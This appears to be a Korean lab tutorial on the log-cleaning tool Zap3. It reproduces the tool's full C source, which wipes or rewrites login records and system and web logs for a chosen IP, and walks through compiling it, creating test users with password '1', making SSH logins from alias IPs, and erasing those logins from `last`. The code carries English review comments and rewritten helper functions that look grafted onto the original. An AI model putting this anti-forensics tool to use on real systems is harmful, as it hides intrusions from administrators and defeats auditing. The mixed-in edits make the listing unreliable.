실습> 로그 삭제 툴 Zap3 사용하기
!!! 각 IP주소는 다를 수 있으므로 자신의 IP주소로 사용하면 된다. !!!
Zap3
user1 ~ user5 <----- ssh -b로 접속
[Server1]------------[Server2]
192.168.101.254 192.168.101.101, 192.168.101.3 ~ 192.168.101.7
1. 다운로드
packetstormsecurity 사이트에서 로그 삭제 툴을 다운로드한다.
https://packetstormsecurity.com/files/25380/logcleaner-0.3.c.html
2. 컴파일
# vi Zap3.c
/*########################################################################
*#### Zap3.c cleans WTMP, UTMP, lastlog, messages, secure, ##############
*#### xferlog, httpd.access_log, httpd.error_log. ##############
*#### Check your log file and edit the source accordingly. ##############
#### Tested in Mandrake 7.2 and 8.0 ##############
*#########################################################################
*#### This program is for educational purposes only ##############
*#### I'm not responsible any damages of this program ##############
*#### Use it with your own risk ##############
*#########################################################################
*#### I change the user based cleaning method ##############
*#### to host based method. Also zap2.c cleans ##############
*#### last entry of wtmp file,i change ##############
*#### this to clean all entries. ##############
*#########################################################################
Copyright (c) darkloop . All rights reserved.
This software is licensed pursuant to the GNU General Public License
version 2 or later versions [or GNU Lesser General Public License],
a copy of which may be viewed at www.gnu.org/copyleft/gpl.html.
*#########################################################################
*#### Please inform me about your comments. ##############
*#### I'm new to C programming so feel free to flame :) ##############
*#### dark_loop@linuxmail.org ##############
*#### www.solitude2000.f2s.com ##############
*#### 15.10.2001 ##############
*#########################################################################
*/
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
/* Binary login records (fixed-size struct utmp / struct lastlog entries);
 * these are rewritten record by record, in place, by clean_utmp, clean_wtmp
 * and clean_lastlog below. */
#define WTMP_NAME "/var/log/wtmp"
#define UTMP_NAME "/var/run/utmp"
#define LASTLOG_NAME "/var/log/lastlog"
/* Text logs filtered line by line by clean_logs. The paths are hard-coded
 * for the Mandrake layout named in the header comment ("edit the source
 * accordingly"); on the el7 host in the transcript below /var/log/syslog
 * does not exist, which is where that run fails. */
#define MESSAGES "/var/log/messages"
#define SECURE "/var/log/secure"
#define SYSLOG "/var/log/syslog"
#define XFERLOG "/var/log/xferlog"
#define AUTH "/var/log/auth.log"
#define HTTPDA "/var/log/httpd/access_log"
#define HTTPDE "/var/log/httpd/error_log"
/* MAX sizes the (otherwise unused) buff[] in clean_logs and is also passed
 * as the fgets() length for the MIN-byte line buffer there; the expansion is
 * unparenthesised. MIN is the line/scratch buffer size shared by clean_logs,
 * str_replace and pos. */
#define MAX 1024*5120
#define MIN 1024
/* Forward declarations; the definitions follow main(). */
void clean_logs(char *host,char *fake);
void clean_utmp(char *host,char *fake);
void clean_wtmp(char *host,char *fake);
void clean_lastlog(char *host,char *fake);
int pos(char *source,char *pattern);
void str_replace(char *source,char *pattern,char *replace);
/*
 * Entry point. argv[1] is the host string to look for in each log record;
 * argv[2], when present, is the replacement host ("fake") written in its
 * place. With a single argument argv[2] is the terminating NULL of argv, so
 * every clean_* routine takes its "erase the record" branch (the runs shown
 * further down use that mode).
 *
 * NOTE(review): no return type is declared (implicit int, pre-C99), and the
 * include list above has neither <stdlib.h> (exit) nor <time.h> (time), so
 * both calls are implicitly declared. The printed figure is the difference of
 * two time_t values in whole seconds, not milliseconds, and "%d" does not
 * match the type of that operand.
 */
main(int argc,char **argv)
{
time_t t1,t2;
if (argc<2) {
printf("missing argument\n");
printf("usage :./zap <ip>\n");
exit(1);
} else {
time(&t1);
clean_utmp(argv[1],argv[2]);
clean_wtmp(argv[1],argv[2]);
clean_lastlog(argv[1],argv[2]);
clean_logs(argv[1],argv[2]);
time(&t2);
printf("the process time is %d ms\n",t2-t1);
}
}
/*
 * Rewrites UTMP_NAME in place. Every record whose ut_host begins with host
 * (strncmp over strlen(host), i.e. a prefix match, not an exact one) has its
 * ut_host overwritten with fake when fake is non-NULL, or is zeroed entirely
 * otherwise. The file is never truncated, so zeroed records remain in the
 * file as all-zero slots of the same size.
 *
 * NOTE(review): on open() failure the error branch only calls close(-1) and
 * then falls through into the read loop with an invalid descriptor; read()
 * fails at once and the "finished" line is still printed. The memcpy copies
 * sizeof(ut_host) bytes from fake regardless of fake's actual length, so a
 * short fake is followed by whatever memory lies after it. The negated
 * sizeof passed to lseek is a size_t and relies on its conversion to a
 * negative off_t.
 */
void clean_utmp(char *host,char *fake)
{
int f;
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))<0) {
perror("open");
close(f);
}
/* Each matching record is written back at its own offset: seek one record
 * back from the position read() left, then write the modified copy. */
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
if(fake) {
memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
}else {
memset(&utmp_ent,0,sizeof( utmp_ent ));
}
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
printf("\tcleaning utmp file finished\n\t");
}
/*
 * Same pass as clean_utmp, applied to WTMP_NAME (the login history read by
 * last(1)): records whose ut_host starts with host are overwritten with fake
 * or zeroed in place. Nothing is removed from the file, so the record count
 * and file size do not change; `last` simply stops listing the zeroed rows,
 * which is what the transcript further down shows after each run.
 *
 * NOTE(review): same open()-failure fall-through and same full-width memcpy
 * from fake as in clean_utmp. From a forensics standpoint the artefact left
 * behind is an all-zero record sitting between valid ones in a file whose
 * size did not shrink; a copy of wtmp already forwarded off-host is not
 * affected by this rewrite.
 */
void clean_wtmp(char *host,char *fake)
{
struct utmp utmp_ent;
int f;
if ((f=open(WTMP_NAME,O_RDWR))<0) {
perror("open");
close(f);
}
while(read (f, &utmp_ent, sizeof (struct utmp))>0) {
if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
if(fake) {
memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
}else {
memset(&utmp_ent,0,sizeof(struct utmp ));
}
/* Seek back over the record just read and overwrite it in place. */
lseek(f,-(sizeof(struct utmp)),SEEK_CUR);
write (f, &utmp_ent, sizeof( utmp_ent ));
}
}
close(f);
printf("cleaning wtmp finished\n\t");
}
/*
 * Same pass over LASTLOG_NAME, one struct lastlog at a time. A record whose
 * ll_host starts with host gets ll_host overwritten with fake, or is zeroed
 * entirely (ll_time and ll_line included) when fake is NULL. NOTE(review):
 * lastlog is conventionally indexed by uid, so zeroing a slot resets that
 * account's "last login" rather than removing anything -- not demonstrated
 * on this page, confirm against lastlog(1) output.
 *
 * Unlike the two routines above, an open() failure here skips the loop via
 * the else branch; the "finished" line is printed either way. The memcpy
 * copies sizeof(ll_host) bytes from fake whatever fake's length, and the
 * negated sizeof passed to lseek relies on size_t -> negative off_t
 * conversion, as in clean_utmp.
 */
void clean_lastlog(char *host,char *fake)
{
int f;
struct lastlog newll;
if ((f=open(LASTLOG_NAME, O_RDWR)) < 0) {
perror("open");
close(f);
} else {
while(read(f,&newll,sizeof(struct lastlog)) > 0 ) {
if(!strncmp(newll.ll_host,host,strlen(host))) {
if(fake) {
memcpy(newll.ll_host,fake,sizeof(newll.ll_host));
}else {
memset(&newll,0,sizeof( newll ));
}
/* Write the modified record back over the one just read. */
lseek(f, -( sizeof (struct lastlog)),SEEK_CUR);
write(f,&newll, sizeof( newll ));
}
}
close(f);
}
printf("cleaning lastlog finished\n\t");
}
/*
 * Text-log pass. For each of the seven fixed paths in logs[] the file is
 * copied line by line into a temporary file named by modlogs[i] -- a relative
 * name, so it is created in the current working directory -- keeping only
 * the lines that do not contain host (or, when fake is given, rewriting host
 * to fake inside every line that contains it). The original is then reopened
 * with "w", which truncates it in place, the temporary copy is written back,
 * and the temporary is unlinked.
 *
 * NOTE(review): defects visible in this block, left as they are:
 *  - the first fopen() error path (perror/fclose/i++) does not leave the
 *    iteration; execution continues into the fgets loop with a stream that
 *    was never opened, or was just closed. When the log itself is missing,
 *    fin is NULL and fclose(fin) is the call that fails -- this matches the
 *    "fopen: No such file or directory" followed by a segmentation fault at
 *    /var/log/syslog in the transcript below.
 *  - the second fopen() pair has the same fall-through, and fclose(fout)
 *    there may be handed NULL.
 *  - buffer is MIN bytes but the copy-back fgets() is told MAX; a line longer
 *    than MIN-1 bytes overflows the stack buffer.
 *  - in the filtering pass a line longer than MIN-1 bytes arrives as several
 *    fgets() pieces, and host is only matched within one piece.
 *  - buff is a 5 MiB automatic array that is only ever set to "".
 *  - str_replace() grows the line inside the MIN-byte buffer with no bound
 *    check.
 *
 * Forensics notes: the log keeps its inode but gets a new size and mtime, and
 * any abort between creating and unlinking mod* leaves that copy in the cwd.
 * In the transcript the crash occurred before a mod* file was created for
 * syslog, so nothing was left behind there.
 */
void clean_logs(char *host,char *fake)
{
int i;
char buffer[MIN],buff[MAX];
FILE *fin,*fout;
char *logs[] = {MESSAGES, SECURE,SYSLOG, XFERLOG, AUTH, HTTPDA, HTTPDE} ;
char *modlogs[] = {"modMESSAGES", "modSECURE","modSYSLOG", "modXFERLOG",
"modAUTH","modHTTPDA","modHTTPDE"} ;
i=0;
/* 7 is the hard-coded length of logs[] / modlogs[]. */
while(i<7) {
printf("cleaning %s\n\t",logs[i]);
strcpy(buff,"");
if((fin=fopen(logs[i],"r"))==NULL
|| (fout=fopen(modlogs[i],"w"))==NULL) {
perror("fopen");
fclose(fin);
i++;
}
/* Pass 1: filter/rewrite lines from the log into the temporary copy. */
while(fgets(buffer,MIN,fin) !=NULL) {
if(fake) {
if (strstr(buffer,host) ) {
str_replace(buffer,host,fake);
fputs(buffer,fout);
}else
fputs(buffer,fout);
}else {
if(!strstr(buffer,host))
fputs(buffer,fout);
}
}
fclose(fin);
fclose(fout);
/* Pass 2: truncate the log and copy the temporary back into it. */
if((fout=fopen(logs[i],"w"))==NULL
|| (fin=fopen(modlogs[i],"r"))==NULL) {
perror("fopen");
fclose(fout);
}
while((fgets(buffer,MAX,fin)) !=NULL) {
fputs(buffer,fout);
}
fclose(fin);
fclose(fout);
unlink(modlogs[i]);
i++;
}
printf("cleaning logs file finished\n\t");
}
#ifndef MIN
#define MIN 1024 /* mirrors the file-level scratch buffer size */
#endif
/*
 * Replaces every occurrence of pattern in source with replace, editing source
 * in place. After each substitution the scan restarts from the beginning of
 * source, exactly as before, so a replacement that itself contains pattern is
 * matched again on the next pass. No bounds are checked: source must have
 * room for the grown string, and the two scratch buffers are MIN bytes.
 */
void str_replace(char *source,char *pattern,char *replace)
{
    char tail[MIN];
    char rebuilt[MIN];
    size_t pattern_len = strlen(pattern);
    size_t replace_len = strlen(replace);
    char *hit;

    while ((hit = strstr(source, pattern)) != NULL) {
        size_t at = (size_t)(hit - source);
        /* Save the text after the match, then rebuild prefix + replace + tail. */
        strcpy(tail, hit + pattern_len);
        memcpy(rebuilt, source, at);
        memcpy(rebuilt + at, replace, replace_len);
        rebuilt[at + replace_len] = '\0';
        strcat(rebuilt, tail);
        strcpy(source, rebuilt);
    }
}
/*
 * Returns the index of the first occurrence of pattern in source, or -1 when
 * source does not contain pattern; an empty pattern matches at index 0.
 * Same contract as the window-by-window scanner it replaces, expressed
 * through strstr.
 */
int pos(char *source,char *pattern)
{
    const char *hit = strstr(source, pattern);
    if (hit == NULL) {
        return -1;
    }
    return (int)(hit - source);
}
# yum -y install gcc
# gcc -o Zap3 Zap3.c
# ./Zap3
missing argument
usage :./zap <ip>
# ./Zap3 192.168.108.1
cleaning utmp file finished
cleaning wtmp finished
cleaning lastlog finished
cleaning /var/log/messages
cleaning /var/log/secure
cleaning /var/log/syslog
fopen: No such file or directory
세그멘테이션 오류
# w
17:20:34 up 21 min, 0 users, load average: 0.00, 0.01, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
# last
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:59 - 17:20 (00:21)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:56 - 16:58 (00:01)
wtmp begins Thu Jan 1 09:00:00 1970
3. 테스트용 IP 추가
192.168.101.101에 설정한다.
# yum -y install net-tools
ifconfig ens33:1 192.168.101.3
ifconfig ens33:2 192.168.101.4
ifconfig ens33:3 192.168.101.5
ifconfig ens33:4 192.168.101.6
ifconfig ens33:5 192.168.101.7
# ip a
# ifconfig
4. 테스트용 사용자 추가
192.168.101.254에서 user1 ~ user5 사용자를 생성한다.
# useradd user1
# useradd user2
# useradd user3
# useradd user4
# useradd user5
# echo 1 | passwd --stdin user1
# echo 1 | passwd --stdin user2
# echo 1 | passwd --stdin user3
# echo 1 | passwd --stdin user4
# echo 1 | passwd --stdin user5
5. ssh 접속
192.168.101.101 -> 192.168.101.254로 접속한다.
# ssh -b 192.168.101.3 user1@192.168.101.254
$ exit
# ssh -b 192.168.101.4 user2@192.168.101.254
$ exit
# ssh -b 192.168.101.5 user3@192.168.101.254
$ exit
# ssh -b 192.168.101.6 user4@192.168.101.254
$ exit
# ssh -b 192.168.101.7 user5@192.168.101.254
$ exit
# last
user5 pts/1 192.168.101.7 Fri Mar 4 17:51 - 17:51 (00:00)
user4 pts/1 192.168.101.6 Fri Mar 4 17:51 - 17:51 (00:00)
user3 pts/1 192.168.101.5 Fri Mar 4 17:51 - 17:51 (00:00)
user2 pts/1 192.168.101.4 Fri Mar 4 17:51 - 17:51 (00:00)
user1 pts/1 192.168.101.3 Fri Mar 4 17:51 - 17:51 (00:00)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:59 - 17:52 (00:53)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:56 - 16:58 (00:01)
wtmp begins Thu Jan 1 09:00:00 1970
6. 로그 삭제
Zap3를 이용해서 각 IP주소를 삭제하고 확인한다.
# ./Zap3 192.168.101.3
192.168.101.3이 삭제된 것을 확인할 수 있다.
# last
user5 pts/1 192.168.101.7 Fri Mar 4 17:51 - 17:51 (00:00)
user4 pts/1 192.168.101.6 Fri Mar 4 17:51 - 17:51 (00:00)
user3 pts/1 192.168.101.5 Fri Mar 4 17:51 - 17:51 (00:00)
user2 pts/1 192.168.101.4 Fri Mar 4 17:51 - 17:51 (00:00)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:59 - 17:53 (00:54)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:56 - 16:58 (00:01)
wtmp begins Thu Jan 1 09:00:00 1970
192.168.101.4를 삭제한다.
# ./Zap3 192.168.101.4
192.168.101.4가 삭제된 것을 확인할 수 있다.
# last
user5 pts/1 192.168.101.7 Fri Mar 4 17:51 - 17:51 (00:00)
user4 pts/1 192.168.101.6 Fri Mar 4 17:51 - 17:51 (00:00)
user3 pts/1 192.168.101.5 Fri Mar 4 17:51 - 17:51 (00:00)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:59 - 17:54 (00:55)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:56 - 16:58 (00:01)
wtmp begins Thu Jan 1 09:00:00 1970